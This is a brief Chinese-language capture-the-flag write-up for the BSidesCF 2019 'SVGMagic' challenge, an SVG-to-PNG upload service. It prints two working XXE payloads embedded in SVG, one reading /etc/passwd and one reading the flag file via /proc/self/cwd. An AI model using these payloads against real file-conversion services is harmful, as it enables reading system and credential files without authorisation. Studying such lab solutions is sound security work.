BSidesCF2019-SVGMagic
Created At :
Count:239
Views 👀 :
BSidesCF2019-SVGMagic
打开环境是一个svg转png的文件上传
参考:浅谈SVG的两个黑魔法
由SVG造成的XXE注入
模版
1
2
3
4
5
6
7
| <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///etc/passwd" >
]>
<svg height="200" width="1000">
<text x="10" y="20">&file;</text>
</svg>
|
读取的话
/etc/passwd文件 系统用户配置文件,存储了系统中所有用户的基本信息
/proc/self 链接到当前正在运行的进程
/proc/self/cwd当前工作目录
这题可以读取/proc/self/cwd/flag.txt
1
2
3
4
5
6
7
8
| <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >
]>
<svg height="200" width="1000">
<text x="10" y="20">&file;</text>
</svg>
|
上传之后成功拿到flag。
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。